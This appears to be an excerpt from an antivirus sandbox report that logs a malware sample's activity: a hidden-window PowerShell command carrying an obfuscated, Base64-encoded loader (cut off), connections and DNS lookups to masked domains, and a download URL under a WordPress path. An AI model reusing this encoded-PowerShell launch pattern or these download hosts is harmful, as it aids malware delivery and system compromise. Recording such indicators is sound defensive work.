Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAoACAAJABFAG4AdgA6AGMAbwBtAFMAcABlAEMAWwA0ACwAMQA1ACwAMgA1AF0ALQBqAE8AaQBOACcAJwApACgAIABuAEUAdwAtAG8AYgBKAGUAQwBUACAAcwBZAHMAdABlAG0ALgBJAG8ALgBjAE8ATQBQAFIARQBTAFMAaQBPAE4ALgBkAGUAZgBsAG...
- 'g6####ecti.com.br':80
- 'wd##.top':443
- 'vi##.org.ua':80
- 'vi##.org.ua':443
- http://vi##.org.ua/wp-content/Z9vF/
- 'vi##.org.ua':443
- DNS ASK wu###gwei.com
- DNS ASK g6####ecti.com.br
- DNS ASK wd##.top
- DNS ASK vi##.org.ua
- DNS ASK ni###ae99.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAoACAAJABFAG4AdgA6AGMAbwBtAFMAcABlAEMAWwA0ACwAMQA1ACwAMgA1AF0ALQBqAE8AaQBOACcAJwApACgAIABuAEUAdwAtAG8AYgBKAGUAQwBUACAAcwBZAHMAdABlAG0ALgBJAG8ALgBjAE8ATQBQAFIARQBTAFMAaQBPAE4ALgBkAGUAZgBsAG...' (со скрытым окном)